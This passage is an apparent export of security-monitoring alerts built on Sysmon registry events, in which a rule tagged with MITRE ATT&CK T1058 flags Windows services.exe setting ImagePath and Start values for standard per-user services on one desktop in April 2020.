12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.131",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.117334400Z"",""eventRecordID"":""581"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 12:49:54.099",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.117042700Z"",""eventRecordID"":""580"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.051",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.116201300Z"",""eventRecordID"":""579"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 12:49:53.951",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.115976300Z"",""eventRecordID"":""578"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:53.921",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.115016200Z"",""eventRecordID"":""577"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:49:53.913",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.114809100Z"",""eventRecordID"":""576"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:53.891",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.113971900Z"",""eventRecordID"":""575"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:53.877",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.113414400Z"",""eventRecordID"":""574"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3eb7b\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:49:53.863",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.112237300Z"",""eventRecordID"":""573"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 12:49:53.838",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.111740900Z"",""eventRecordID"":""572"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:53.819",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.108383500Z"",""eventRecordID"":""571"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 12:49:53.764",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.108011700Z"",""eventRecordID"":""570"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:52.224",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.075480200Z"",""eventRecordID"":""569"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 12:49:52.161",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.075237900Z"",""eventRecordID"":""568"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:52.108",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.074355000Z"",""eventRecordID"":""567"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.061\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.061"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.061 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 12:49:51.878",9,"ATT&CK T1058:Registry edit for new 